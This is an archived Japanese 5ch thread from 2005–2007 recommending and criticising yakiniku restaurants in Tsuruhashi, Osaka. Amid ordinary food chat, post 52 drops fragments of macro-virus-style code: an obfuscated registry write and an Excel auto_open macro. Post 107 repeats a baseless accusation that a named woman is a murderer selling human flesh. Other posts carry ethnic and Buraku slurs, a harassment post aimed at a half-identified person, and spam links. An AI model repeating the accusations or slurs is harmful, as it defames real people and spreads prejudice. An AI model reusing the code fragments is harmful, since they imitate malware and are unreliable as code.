5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大阪 鶴橋 うまい焼肉店は?

1 :名無しさん@お腹いっぱい。:2005/09/12(月) 22:26:32 ID:SnERvDCN
おすすめのお店はありますか?

2 :名無しさん@お腹いっぱい。:2005/09/13(火) 16:08:12 ID:bo3DDY2u
無い。
以上。

3 :名無しさん@お腹いっぱい。:2005/09/13(火) 20:42:18 ID:miQ8/ZYv
鶴一嫌い

4 :名無しさん@お腹いっぱい:2005/09/14(水) 17:50:15 ID:E9zBs/AZ
昔の鶴一は良かったんだよ
べた座りで、上着をビニール袋に入れて
炭火で焼く これ最高やったのにね

5 :名無しさん@お腹いっぱい。:2005/09/14(水) 19:28:04 ID:I7EKcfXv
太久 心斎橋店ウマー ミュウズホウルの隣のビルにある

6 :名無しさん@お腹いっぱい。:2005/09/15(木) 23:17:19 ID:YqvP7Rwr
特にバツ1さんの出会い。恋人作りや友達作り。おすすめリンク。
楽しい居酒屋やおすすめナイトスポット情報のコーナー。
美人ママさんやホステスさん看板娘を紹介しあう掲示板もあります
http://www.hamq.jp/i.cfm?i=neo2005

7 :名無しさん@お腹いっぱい。:2005/09/24(土) 01:46:11 ID:MeT8J2Ik
あの骨カル、ついていけへん

8 :名無しさん@お腹いっぱい。:2005/09/24(土) 04:11:17 ID:fmEEbR5a
鶴橋でうまい焼き肉屋はないの?

9 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:14:23 ID:ZxbHq9Dt
無くなりました。無念。

10 :名無しさん@お腹いっぱい。:2005/10/08(土) 20:31:10 ID:v7xiUVCk
寿司の街 小樽
味噌ラーメン発祥の地 札幌
焼き鳥の街 新橋
焼肉の街 鶴橋

いい意味でも悪い意味でも共通する点が多い。

俺をはじめ、ここに書き込みをして鶴橋だめぽ説を唱える連中の共通点は
・贅沢になり舌が肥えている
・もっとええとこ知ってるという自慢
・昔は喜んで鶴橋に通っていた。
・今一番のお気に入りの店は決して書かない。

軽はずみな書き込みで店に変な客が増えて店が迷惑することも多い。





11 :名無しさん@お腹いっぱい。:2005/10/09(日) 07:54:10 ID:WDj3vcgD
馬鹿野郎、人口一万人に対する焼き鳥店舗数7.46軒の久留米が焼き鳥はナンバー1じゃ、ぼけ

12 :名無しさん@お腹いっぱい。:2005/10/09(日) 10:25:43 ID:YXjsjXJs
大阪西梅田にある「とんや」という店で食あたりになりました。
俺だけかなと思ったら一緒に行った奴も下痢で食あたりと診断されました。
これって食中毒?
店に文句言いに言ったら恐喝ですか?と逆ギレされた。。。。
あんな対応の悪い店あったいいの?


13 :名無しさん@お腹いっぱい。:2005/10/09(日) 11:28:04 ID:b1RK2QGF

ttp://www1.mhlw.go.jp/houdou/0909/h0917-1.html

輸入のキムチから感染したと思われる回虫症が同一の飲食店で2例続けて発生し、
そこで提供された韓国直送のキムチから回虫卵を検出できた例やブタの有鉤条虫
卵に汚染されたキムチを食べて脳内に有鉤嚢虫が発見 された報告もあります。
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^    
(3)有鉤嚢虫

成虫である有鉤条虫は広く世界に分布し、本症は、主に有鉤条虫卵の付着した食品の摂食により感染し、
各種臓器に有鉤嚢虫の腫瘤を形成する。症状は重篤で、嚢虫が脳、脊髄または眼球に寄生すると痙攣、
意識障害、麻痺、精神障害などを起こすことがある。

近年、輸入キムチが原因として疑われれている報告がある。

【事例】 神奈川県在住、21歳女性。焼き肉が好きでよく食べるが、生肉は食べない。キムチが好きで、韓国産
のキムチ漬けを購入し常食していた。1ヶ月前から感冒様症状があり、左上肢のしびれと右上肢の筋力低下を
感じ来院。頭部CTスキャンでは脳内に計1〜2cmの腫瘤陰影が、血液検査では好酸球の増多が認められた。
このため、寄生虫症を疑って抗体検査を行ったところ有鉤条虫に対する反応が陽性であった。

http://blogimg.goo.ne.jp/user_image/4e/cb/3d0e9f9813131e195a67c1cc7179c8dd.jpg
キムチの寄生虫、有鉤条虫に巣食われた脳


14 :名無しさん@お腹いっぱい。:2005/10/12(水) 00:41:06 ID:2rYJSOOz
大阪が嫌いな理由

1、バクチ、風俗、酒、金、愚痴のことしか話題にならない。
2、被害妄想が激しく自分さえ良ければいいという考え。
3、治安が極悪(大阪市)
4、893、在日、部落、肉屋が行政を動かしている。逆差別が激しい。
5、阪神タイガースは大阪のものだと言っている件について。
6、おっさんのわめき声が絶えない。
7、決まりを守らない。期日を守らない。ありとあらゆる法律が機能しない。(民法、道交法など)
8、酒を飲めば全てが許されるという考え。
9、おまけに掌をすぐに返す。
10、北斗の拳には世紀末救世主がいたが現実には大阪に救世主がいない件について。



15 :10:2005/10/16(日) 14:40:46 ID:WzQ7Vwyc
>11
7.46は凄いが数え方に問題があると思う。
そういうデータでは今治が一番、
東松山も7.5くらいあるが焼き鳥屋ではない店が多い。
久留米も焼き鳥ではない豚や牛の串焼き屋、焼き鳥メニューのある
居酒屋、ラーメン屋を数えているので日本一ではない。

新橋駅前半径1キロだけに限定すると、人口1万人に対して200件くらい
の焼き鳥屋があるが久留米はこれに勝てるか?

そもそも店が多い、有名、だからいい、という意見を述べているわけでも
ないのに、無名の久留米を出して何がいいたいのかわからん。



16 :名無しさん@お腹いっぱい。:2005/10/16(日) 17:48:10 ID:BeyBHeQp
 『まるいち』。美味い肉が手頃な値段で食べられる。

17 :名無しさん@お腹いっぱい。:2005/10/16(日) 20:48:24 ID:PeGzQ2ZT
>>16
肉そのものは、それなりだが・・・・。
タレが絶品、これぞ焼肉って味だ罠。

18 :10:2005/10/16(日) 21:20:55 ID:kyKLfQEP
肉とタレ 
どっちが大事?
これって究極の選択だな。


19 :名無しさん@お腹いっぱい。:2005/10/17(月) 13:00:28 ID:epZZ0MUb
牛とってガス火やん
店汚いし大してうまくないと思ったが行列

20 :名無しさん@お腹いっぱい。:2005/10/17(月) 15:11:54 ID:RmsOxkYo
大阪が嫌いな理由 って もう いいし 勝手に嫌えば いいじゃん 馬鹿みたい

21 :名無しさん@お腹いっぱい。:2005/10/20(木) 01:02:41 ID:+rWjjGl+
>>20
スルーしろって、こいつ他のスレにもよくでてくるから。

22 :たっくん:2005/12/08(木) 11:26:22 ID:Grajgc1q
新しいお店が出来ていて、名前は薫風だったかな〜
焼肉自身もおいしかった! 何よりも今までにない
お店のつくりで現在鶴橋NO1じゃないかな〜

23 :名無しさん@お腹いっぱい。:2005/12/08(木) 11:29:51 ID:oP1AZeHU
やっと まっとうなご意見がでました。ありがとう。大阪嫌いっていうのはもうええって。
しつこいわ。

24 :名無しさん@お腹いっぱい。:2005/12/09(金) 06:29:34 ID:/2zOMspN
大都会 大阪
http://www.skyscrapercity.com/showthread.php?t=96139
http://osakanight.xrea.jp/skyscrapers/photo/toshin_e.htm

25 :名無しさん@お腹いっぱい。:2005/12/22(木) 00:52:01 ID:zrOBf8x/
まるいち書こうとしたら既に書いてあるな。俺もここは大好きだ。
だけど「マグマ焼肉」の看板が色もんぽいからか土曜なんかでも
鶴一やアジヨシは行列が出来てるのにまるいちはガラガラで流行って
ない。味は本当にうまいのに。

26 :名無しさん@お腹いっぱい。:2005/12/28(水) 00:27:22 ID:FchDQW8Y
輸入牛再開の恐怖

27 :名無しさん@お腹いっぱい。:2006/01/29(日) 01:26:40 ID:EVus0QOt
天満のあじ丸に池

28 :名無しさん@お腹いっぱい。:2006/02/15(水) 22:33:11 ID:RSIxh5/z
きようばしのげんきくん

29 :名無しさん@お腹いっぱい。:2006/02/16(木) 00:02:46 ID:zHlHzQ1M
>>28
こっちにも現れたか…。失せろ。

30 :名無しさん@お腹いっぱい。:2006/02/16(木) 00:28:15 ID:6SFQUF49
コリアンタウンでキムチ刈って自分ちで焼肉食った方が良いような…。
鶴一並んで食べたけどあまり美味しいとは思わなかった。

31 :名無しさん@お腹いっぱい。:2006/02/17(金) 12:56:23 ID:isXyPG/W
>>30
それが普通だよ
観光客、目当ての店ばっかだから
俺は地元だけど最近は全くいかないよ

32 :名無しさん@お腹いっぱい。:2006/02/18(土) 00:09:25 ID:wLUBIzt3
つか上本町方面や桃谷に良い店たくさんあるんだから少しぐらい足を伸ばせよと。

33 :松浦淳 ◆nRyyaioqho :2006/02/18(土) 03:28:38 ID:xAqix0Lh
鶴橋風月は?

34 :名無しさん@お腹いっぱい。:2006/02/19(日) 02:06:06 ID:gztjVTpb
タンが凍ってる所はだめだね

35 :名無しさん@お腹いっぱい。:2006/02/26(日) 22:23:47 ID:N9/M5n4l
ネタでなく、マジで元気くんは大阪最強焼肉だと思うぜ
あれだけサシのガッチリ入った良質の肉を腹一杯喰って、ひとり3000円いかないもん
おすすめだぜ

36 :名無しさん@お腹いっぱい。:2006/02/28(火) 10:15:32 ID:H5+rDO9i
関西に旨い焼肉屋など無い。
これはもう常識。論ずるに足らん。

37 :名無しさん@お腹いっぱい。:2006/02/28(火) 12:21:31 ID:x4LLrwPW
>>35 あああの京橋のスタミナ軒なぁー!きったない店のわりにうまいよな。タンコロはガッツリ焼くのや、生キモ、ハラミもわすれなや!カウンターとテーブル1つやから、お早めに

38 :名無しさん@お腹いっぱい。:2006/02/28(火) 13:02:05 ID:Xa6bIcC6
「ごみ餃子」波紋、関連業界に拡大

1999年11月から最近まで、W食品から330t(およそ1億7000万相当)の納品を受けたA社は
「今回摘発された不良具材は米国や日本への輸出用として製造されたため、国内には流通していない」と釈明した。

ttp://japan.donga.com/srv/service.php3?biid=2004060858588


39 :名無しさん@お腹いっぱい。:2006/02/28(火) 19:23:15 ID:3SrSHrdZ
>>37
テラワロス

40 :名無しさん@お腹いっぱい。:2006/03/01(水) 00:44:03 ID:tgivmO9D
>>39>>39>>39>>39>>39>>39テラワロス

41 :名無しさん@お腹いっぱい。:2006/03/01(水) 17:15:49 ID:00V8NVm+
吉田ってウマイの?

42 :名無しさん@お腹いっぱい。:2006/03/06(月) 16:39:51 ID:X6PMfLVi
age

43 :名無しさん@お腹いっぱい。:2006/03/16(木) 16:32:37 ID:JMaHACbZ
大邸家最強

44 :名無しさん@お腹いっぱい。:2006/03/18(土) 19:45:45 ID:dl3aqw0+
鶴一、昔は美味かったんだけど・・・
という話がよく出てますけど、今は駄目なんですかね?
二年前くらいに行って結構私的にはよかったんですけど。

45 :名無しさん@お腹いっぱい。:2006/03/18(土) 22:33:12 ID:LFAMrR1r
鶴橋は、犬糞寄生虫痰入り焼肉店発祥の地

46 :名無しさん@お腹いっぱい。:2006/03/22(水) 00:18:35 ID:3tuMK8t9
吉田の赤セン

47 :名無しさん@お腹いっぱい。:2006/03/22(水) 07:22:52 ID:3Ltdg95W
まずー

48 :名無しさん@お腹いっぱい。:2006/03/22(水) 07:25:09 ID:3Ltdg95W
>>46ごきぶらみたやつ

49 :名無しさん@お腹いっぱい。:2006/05/11(木) 00:11:53 ID:u6Z/cn+b
>>44
昔はよかったんだけどね

50 :名無しさん@お腹いっぱい。:2006/05/13(土) 23:46:55 ID:UKYsak9b
アジヨシのねぎ塩たんおいしいよ

51 :名無しさん@お腹いっぱい。:2006/05/14(日) 05:29:22 ID:TQCOPK0E
海南亭はどう?

52 :名無しさん@お腹いっぱい。:2006/05/14(日) 10:29:02 ID:KLLONm7z
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


53 :名無しさん@お腹いっぱい。:2006/05/15(月) 21:35:18 ID:dUCdTo6g
海南亭はあの甘い酸っぱいタレがねぇ感心しない。肉質はいいのに。

54 :名無しさん@お腹いっぱい。:2006/05/16(火) 12:18:48 ID:8+J2gmVs
大麦若葉青汁のCMに出てる店はどうですか?

55 :名無しさん@お腹いっぱい。:2006/05/30(火) 23:41:58 ID:Q+KFpLMk
鶴嘴なら鶴二郎だろ!

56 :名無しさん@お腹いっぱい。:2006/07/01(土) 14:04:02 ID:Fet+NdzU
魔法のレストランでやってた、女性に人気の焼き肉店の名前を教えてもらえますか?

57 :名無しさん@お腹いっぱい。:2006/07/02(日) 22:44:07 ID:NfJL1B3/
>>56 焼肉の楽でーす

58 :名無しさん@お腹いっぱい。:2006/07/07(金) 14:31:00 ID:t2+5zz/O
「やあむ」ってどうよ?

59 :名無しさん@お腹いっぱい。:2006/07/10(月) 16:12:02 ID:y8vrIMbH
吉田うまいですよ〜

60 :名無しさん@お腹いっぱい。:2006/07/16(日) 00:48:01 ID:Ifo+xK+N
アムソってどうですか?
若い兄ちゃんがやってるとこだと思うんですけど

61 :名無しさん@お腹いっぱい。:2006/07/16(日) 07:16:22 ID:ZOKjFQcT
59》漏れも吉田が美味いと思うよ。

62 :名無しさん@お腹いっぱい。:2006/07/25(火) 18:40:49 ID:K7og2dDE
アジヨシうまいとおもわんかった。
タンぶあついねん・・・

63 :本田:2006/08/05(土) 12:21:40 ID:ElCQzEIv
今日、鶴橋で焼肉たべにいくんやけど、数ある鶴橋の焼肉屋で一番おいしいのは
やはり、吉田ですか?

64 :名無しさん@お腹いっぱい。:2006/08/05(土) 23:32:50 ID:efLfW+yU
吉田はまだましかな…
はっきり言って、卸しで買って家で食うほうが美味いな…

65 :神落:2006/08/06(日) 16:37:11 ID:blJ8Zcg3
名前忘れた…味楽園だったかな…
三角バラってのは美味かった(メニューに無)

66 :本田:2006/08/06(日) 20:44:38 ID:15A9yfHo
確かに、卸しで買って家で食うほうが安いし、いいと思いますね。
でも、あの鶴橋のふいんきを味わいながら肉を楽しむのもいいですよ。
ちなみ、昨日、吉田へ行ってきました。塩タン一人前で2500円した。
鶴橋の焼肉屋は全体的に高いですね(^^♪

67 ::名無しさん@お腹いっぱい:2006/08/07(月) 17:25:01 ID:AIGtJxrB
鶴一は昔、煙もうもうで上着をゴミ袋に入れて
預かってた頃が頂点だよ
あの座敷が懐かしい

68 :名無しさん@お腹いっぱい。:2006/08/12(土) 12:36:02 ID:zI2vvS3p
アジヨシのコテツってめちゃくちゃ好きなんだけど
他の店でも、コテツってメニューあるの?
見たことないんだけど

69 :本田:2006/08/15(火) 10:56:25 ID:FxS/mrbT
コテツ?って何?
あ、そうそう、鶴橋の焼肉屋で「そら」っていう名前の焼肉屋ありますか?
吉田よりおいしいと聞きましたが、誰か情報をお願いします。

70 :名無しさん@お腹いっぱい。:2006/08/15(火) 12:52:44 ID:9r2PVQMe
コテツ?コテッチャンのことかな?

71 :名無しさん@お腹いっぱい。:2006/08/15(火) 13:00:42 ID:9r2PVQMe
鶴橋に「空」ありますよ
青いテントのちと狭い店です
個人的には雰囲気は良いと思います
量は少なめ、単価は安い、味はそこそこ…こんなイメージです

味で比べるなら吉田のが良いですね…値段はやや高いですが

72 :名無しさん@お腹いっぱい。:2006/08/16(水) 12:16:16 ID:ajOUEBWh
今日、鶴橋へ肉、食いに行くことになった。
鶴一は並ぶからパス。
高すぎてもパス。
どこやどこやどこがええ?

73 :名無しさん@お腹いっぱい。:2006/08/16(水) 13:07:44 ID:quPQfJ4v
>>72
悪いことは言わん、5分程足を伸ばし、小橋町界隈にしとけ。
値段的には、健康館パゴダ白雲か小川亭とらちゃんが安い方。
まあ、予約なしではキツイかも知れんが。

74 :名無しさん@お腹いっぱい。:2006/08/16(水) 17:54:52 ID:rx3AyI7Y
>>69
日本語で言うと小腸のようです
東京のホルモンではだされるみたいなんですが
大阪ではあんまり見かけなくて
どこかないかなと思いまして・・・

75 :名無しさん@お腹いっぱい。:2006/08/17(木) 02:18:20 ID:i1ZLbp05
小腸はコテッチャンでしょ?
みんな分かって突っ込んでたと思うんだけど、
テッチャンのチャンは愛称に付けるチャンとは違うよ。
だから、呼び捨てヨクナイ。

76 :名無しさん@お腹いっぱい。:2006/08/17(木) 06:32:20 ID:GH6zvRm0
鶴橋の焼肉店は芸能人には上質な肉を出して宣伝してもらう、釣られて食べに行っても美味しい店は無いです!

77 :名無しさん@お腹いっぱい。:2006/08/18(金) 11:47:20 ID:1Mwwafp4
牛斗のオーナーみたいなチビオヤジは態度悪いよ

78 :名無しさん@お腹いっぱい。:2006/08/18(金) 21:54:52 ID:sg1ED9UD
昨日牛といったぞ。
オーダーしたもんが二品ももれててでてこなかった。店員の対応も… まあもういかないけどな
大吉はどう?

79 :名無しさん@お腹いっぱい。:2006/08/18(金) 21:59:19 ID:Z8Tou/Zx
【ありえない】唐辛子ジュースをトマトジュースと間違って客へ
http://food6.2ch.net/test/read.cgi/salt/1153646180/

18日正午の岐阜県内韓国料理レストランで、唐辛子が多量に入ってたジュースを
客にトマトジュースとして間違って出していた事がわかった。
店によると唐辛子ジュースはそもそもメニューになく、厨房内のコックが
自分用に特別ブレンドして置いていたのを別の店員が持っていってしまった
という。飲んだ客は一度にかなりの量を飲み込んでしまったため
一応病院で診察を受けているという。
店舗マネージャーの超さんは
「まさに気の緩みがもたらしたもの店員全員に厳重注意をしておきます」
と話していると言う。

80 :名無しさん@お腹いっぱい。:2006/08/20(日) 04:04:20 ID:yDFiDUwW
最近大阪来ていろいろ情報集めてやっと捜し当てたパコダ白雲館。美味かった!二人で生4杯¥7000だった!次は萬野って所に行く予定!

81 :名無しさん@お腹いっぱい。:2006/09/06(水) 11:32:46 ID:xPQ85p3K
マンノは微妙と…     パコダはおいしいよね

82 :名無しさん@お腹いっぱい。:2006/09/06(水) 16:31:11 ID:VOkWW9G2
パゴダ白雲台はうまいね、なまものが弱いのとホルモンの種類が少ない
のが残念、でも好きだな。
最近の萬野は、当たり外れが激しいので、ご意見番リセットしました。

83 :名無しさん@お腹いっぱい。:2006/09/06(水) 20:19:54 ID:vidCaULQ
俺は、マンノは味の方はまあまあいけると思う。
しかし値段のわりにはちと量が少ないかなと思うな。
(なんせ、よく食うので)
しかしあそこは前の道よく通るけどいつも混んとるわ。
ところで最近上本町に「マンノホルモン館」ってできたけど
どんな感じですか?

84 :名無しさん@お腹いっぱい。:2006/09/06(水) 20:27:09 ID:9AH5MMEO
http://20.xmbs.jp/osakadotcom/

85 :名無しさん@お腹いっぱい。:2006/09/07(木) 03:56:03 ID:lhLBUWuZ
マンノのホルモン館は上品すぎて…肉が少なくて女性向けみたいな感じっす!
焼肉食いにいく覚悟で行ったら物足りないかも…
パコダは肉はおいしいけどどんぐり冷麺が微妙と…けど近所なのでパコダラブ

86 :名無しさん@お腹いっぱい。:2006/09/07(木) 12:01:46 ID:VUSMIc/2
アジヨシの冷麺たべたけど、すげーまずいじゃん

東京から出張したときに食べたけど、「なんじゃこれ?」って感じ
店のチョイス失敗したんだろうな

87 :名無しさん@お腹いっぱい。:2006/09/07(木) 22:42:55 ID:EoZW1SiM
>>86
そのとおーり!
何故、小橋町界隈に行かない。 大事な大事な出張チャーンス。

88 :名無しさん@お腹いっぱい。:2006/09/07(木) 23:21:22 ID:ww8BxFrd
>>87
おまえ、面白いつもりなんだろうけど、すげーつまんねーよ

89 :名無しさん@お腹いっぱい。:2006/09/08(金) 00:05:52 ID:46Cxj3rr
>>85
ナイスな情報ありがd!

90 :名無しさん@お腹いっぱい。:2006/10/10(火) 12:35:25 ID:eGZtk2Qh
鶴一行ったらめちゃくちゃまずかった。
昔のイメージだけで行ったら全然あかんし・・・
上○○とか頼んでやっと普通くらいの味だった。
行く前にこのスレみときゃよかった・・・

91 :名無しさん@お腹いっぱい。:2006/11/05(日) 11:34:00 ID:lhdG2WGc
牛一もぜんぜんだめだった。どーして並ぶのかわからない。
お客さんがマスコミに流されすぎ。

92 :名無しさん@お腹いっぱい。:2006/11/07(火) 07:07:36 ID:xOB3Cjlk
大吉の名前が何故挙がらん?
大吉はかなり美味しい

93 :名無しさん@お腹いっぱい。:2006/11/10(金) 20:03:47 ID:n2+nf3Ss
鶴一の改装後の劣化にあぜん

94 :名無しさん@お腹いっぱい。:2006/11/21(火) 16:50:35 ID:M8djE5Kp
鶴一の劣化は20年ぐらい前から。おれが最後に行ったのは15年前。

95 :名無しさん@お腹いっぱい。:2006/11/21(火) 18:44:27 ID:/iAy91lO
鶴一はあの20年ぐらい前の改装で部屋中煙だらけで目が痛くなるような炭火コンロから
無煙ロースターに切り替えていった頃から何故か肉も駄目になったな
あの頃までは確かに肉も納得のレベルだった

96 :名無しさん@お腹いっぱい。:2006/11/22(水) 09:03:30 ID:DzCOD1hA
肉の仕入業者を変えてからダメになったと言う噂もあるね。

97 :名無しさん@お腹いっぱい。:2006/12/12(火) 07:40:04 ID:Ud2HvoNY
鶴橋周辺には野良犬がいないよね

98 :名無しさん@お腹いっぱい。:2006/12/13(水) 00:10:43 ID:vmSIX49B
アジヨシはタレ旨いな

99 :名無しさん@お腹いっぱい。:2006/12/13(水) 00:23:19 ID:LeA2mS44
自分今25才やけど小5の時に鶴一の美味さにびっくらこいたなー。


100 :名無しさん@お腹いっぱい。:2006/12/18(月) 22:15:54 ID:jeGsYNfx
空でしょ、空。

101 :名無しさん@お腹いっぱい。:2006/12/20(水) 10:54:18 ID:z7R1Euwx
そら そうよ

102 :名無しさん@お腹いっぱい。:2006/12/29(金) 16:10:40 ID:ns2jitEn
みんな、教えて。
今度、会社の出張で大阪に集団で遠征するんだが、鶴橋近辺のおいしい焼肉屋を頼む。
人数が10〜15人、その上ランチときたもんだから、どこがいいのかさっぱりわかんない。

詳しいヒト、頼む!
なんとかよろしく!!

103 :名無しさん@お腹いっぱい。:2006/12/30(土) 14:56:44 ID:6KTKmYIf
鶴嘴の焼肉やはしょぼい芸人の色紙ばっか並べて量が少ない。高い。
色紙うざい。

104 :名無しさん@お腹いっぱい。:2006/12/30(土) 16:42:05 ID:Sbfn0PSH
話の種提供
1981から1983の間にK谷市H陽中にてY十郎23X-1Xの
7某国井家系大作の子学とその仲間たちは
5あらゆる身障者と差別されやすい容姿や身体的特徴
5のある人を化け物呼ばわりし、
7第三者の視線が外れると裏顔をあらわし
0弱者に対しては豹変しキチガイやくそたれなどの人に向けてはいけない
0言葉を交えた恫喝、罵倒を行う
社会的弱者や負組が特に嫌いで死ねばいいと度々発言している
こういう類は親族ともども不幸とは無縁の
社会的信用を得たお金持ちの生活をしている


105 :名無しさん@お腹いっぱい。:2007/02/05(月) 12:17:31 ID:+QU2WHIe
経営者が宣伝するスレか

106 :名無しさん@お腹いっぱい。:2007/02/07(水) 22:37:15 ID:RyEL1qCc
鶴1に一票

107 :名無しさん@お腹いっぱい。:2007/02/07(水) 22:49:09 ID:2EBVejg/
111:名無しさん@お腹いっぱい。 :2006/12/23(土) 17:53:06 ID:A6xWtg1h
近藤啓子(1期生)が殺人テロリストなのは間違いない。
佐藤了は学生や卒業生を使った殺人テロ企画を多発させている。
安藤氏もこの殺害風土で消された可能性がある。
この県の殺人稼業は警察ぐるみである。
赤ん坊から老人まで年間1000人はこの殺人商売制度で消され換金されている。
殺人業態は造園業、道路工事業、除雪作業、病院などの形態を表面上は取り
集団で人を狩り、人肉や臓器に換金する。近藤啓子が殺人テロリストなのは間違いない。
殺害対象は赤ん坊まで多数含まれ、この県では病院で赤ん坊死体が食通マニアのために販売されている。
警察や病院も当然ぐるであり、赤ん坊殺人に関わっている。近藤啓子が殺人テロリストなのは間違いない。
こういった殺人理論を開発しているのが保全生態学(森林科学)研究室である。
その上で環境教育と称してカルト殺人教育を行い、卒業生の一部は次々と県民を殺害し
死体を解体して生計を立てている。それがこの県の実態の一面である。
近藤啓子が殺人テロリストなのは間違いない。年間1000人以上が殺害され自然死偽装されている。
近藤啓子が殺人テロリストなのは間違いない。この県の住民は彼女を見かければ殺人業者として
接するべきである。そうしないと騙されて喰われる。近藤啓子が殺人テロリストなのは間違いない。
県民は全員、気をつけてほしい。年間1000人以上が理不尽に消され喰われている。
造園業者は危険だ。近藤啓子が殺人テロリストなのは間違いない。

他県へ「出稼ぎ」もする

108 :名無しさん@お腹いっぱい。:2007/02/16(金) 03:45:59 ID:6tISC91j
鶴一の改装っていつやったの?
俺10年位前の夏に食ってた時は結構煙たかったけど美味かった印象があったんだけど
それから変わったのなら行くのやめとこうかな?

109 :名無しさん@お腹いっぱい。:2007/02/20(火) 22:11:46 ID:nEP3V8Xl
俺も知りたい

110 :名無しさん@お腹いっぱい。:2007/02/21(水) 05:42:54 ID:ZJt7bQ7Y
大邸家って知ってます?
かなり旨いと思うんだけど

111 :名無しさん@お腹いっぱい。:2007/02/22(木) 12:02:31 ID:Kr/3zAqk
2年前「空」へ行って以来大阪から関東に引っ越してしまい
おいしいホルモンにであえない・・・
俺はミノサンドとウルッテがお気に入りだった。
ウルッテなんて関東で見たことないよ〜
空が恋しいよ〜。キムチもうまかったな。

112 :バタイユ:2007/02/23(金) 09:29:01 ID:aQb76CII
鶴橋にはないなぁ、
桜ノ宮の味福園が旨くて手頃。生タン、塩ヘレ、サンチュムンチ、うまいで ホルモンはやめとき。肉だけな。

113 :名無しさん@お腹いっぱい。:2007/02/23(金) 19:28:16 ID:scCnRJI0
てっちゃんが安くて美味いところはない?

114 :プロフェッサー:2007/02/25(日) 21:03:17 ID:N6LsTtU4
天神橋筋六丁目の宗方屋オススメです!!
おいしくてメチャ安かったですょ♪


115 :名無しさん@お腹いっぱい。:2007/02/26(月) 00:23:14 ID:rB+vwwY6
食べ放題ちゃうんか?

116 :名無しさん@お腹いっぱい。:2007/02/26(月) 23:52:46 ID:7d6N7TYl
>>111
種類ではかなわないが、亀戸ホルモンというところが、東京では
うまいと思う。
亀戸の美味い焼肉屋
http://food7.2ch.net/test/read.cgi/kbbq/1162843994/

117 :名無しさん@お腹いっぱい。:2007/03/04(日) 12:05:35 ID:B7kHBs++
空って何気に芸能人が普通に食べてますねぇ
私はコブクロの黒田さんがカウンターで食べてるの見ましたよ
あそこは芸能人がよく来るのに写真や色紙を一切かざらないので
なぜって聞くと店が狭いから一枚かざると皆かざらな失礼やしそれをすると
メニューが隠れるからできないっていってましたよ


118 :名無しさん@お腹いっぱい。:2007/03/05(月) 22:10:24 ID:bTMVfcDp
鶴橋やたら叩かれてるけど 味付けも旨い店多いと思うけどなぁ 高いけど… 釜山家は いけてます

119 :名無しさん@お腹いっぱい。:2007/03/07(水) 10:28:48 ID:AAB4vvbZ
大倉行ったが最悪だった。
焼肉頼まずホルモン鍋+雑炊頼んだんだが、やたらと店主らしきおばはんが
「内で一番安い食べ方や、これ儲けないわ」ってのをテーブル来るたびに言う。
野菜とテッチャンで1800円、儲けがない訳がない
レジでもまた「次は豪勢に焼肉頼んで」とかぬかしやがる。
鍋と焼肉一緒に食えないだろ?そんなに鍋食べて欲しくないならメニューからはずせばいいのに
昔大倉で焼肉食べた時もうまくなかったしもうイカネ

120 :生野のカリスマ ◆8x8z91r9YM :2007/03/08(木) 20:21:09 ID:39iVxex+
一条通りの新楽井がトータル的に1番美味いわ

121 :名無しさん@お腹いっぱい。:2007/03/09(金) 01:34:16 ID:uHsNPURK
>>119
ここで陰口叩くならなぜ精算の時に直接言わないの?

122 :名無しさん@お腹いっぱい。:2007/03/09(金) 01:39:20 ID:uHsNPURK
>「内で一番安い食べ方や、これ儲けないわ」ってのをテーブル来るたびに言う。

このテッチャン1800円もするんですか?すごい最高級品のテッチャンですねえ〜

>レジでもまた「次は豪勢に焼肉頼んで」とかぬかしやがる。

え!!知り合いにここのホルモン鍋はうまいって聞いたんですがねえ〜〜?

これぐらいニヤニヤしておばはんに俺なら言ってやるけどなw

123 :名無しさん@お腹いっぱい。:2007/03/09(金) 16:16:26 ID:4ujb12NU
>121
韓国人怖いもん

124 :名無しさん@お腹いっぱい。:2007/03/09(金) 16:35:06 ID:FQYLbtFW
牛一はサクラ雇ってる気がする。
前を通る度におかしな出来事がおきる。
 
@他の店は並んで無いのに何故か牛一は並んでいる。
A店から出てきた客が「ココにして良かったなー。」 
Bそんなに客が居ない昼間、自分達の前を歩いていた客が店に入った。
案内の兄ちゃんは、一階が空いているにも関わらず「ハイ!三階へどうぞ!」
 
絶対おかしい。

125 :名無しさん@お腹いっぱい。:2007/03/10(土) 16:21:19 ID:VZjfGKNB
海南亭ってどう?ちょっと高くない?

126 :名無しさん@お腹いっぱい。:2007/03/10(土) 21:39:06 ID:V608DwWS
>>124
自分たちも三階行かせてくれって言ったらいいのに
で、向こうが拒んだら前にいたひとはどうして三階に案内したのか
聞けばいいしw

127 :名無しさん@お腹いっぱい。:2007/03/10(土) 21:46:46 ID:VZjfGKNB
神牛ってどう?

128 :名無しさん@お腹いっぱい。:2007/03/15(木) 02:03:14 ID:LnqmUrvh
>>123
そのIDなら梅田がいいよ

129 :名無しさん@お腹いっぱい。:2007/04/10(火) 17:35:17 ID:rj46+TSs
>>110高そうなイメージ
実際はどう?

130 :名無しさん@お腹いっぱい。:2007/04/27(金) 11:40:42 ID:/R+ARGJ4
海南亭 昔はおいしかったけど今は高いだけ。
緑橋の海南亭はとにかくマズイ!
鶴嘴限定なら、無難に明月館の上位やね。あとレーメンうまいし。

131 :名無しさん@お腹いっぱい。:2007/04/27(金) 16:15:04 ID:M9IhoYIV
出張前に鶴橋に寄ったとき鶴一に行ったけど
今まで食べたことないほどまずかった。
並んでる連中はあんなので満足してるの?
大阪七不思議のひとつでは?

132 :名無しさん@お腹いっぱい。:2007/04/29(日) 16:31:55 ID:iQ1Rty9Z
>>131
お前の舌が腐ってるんだろw

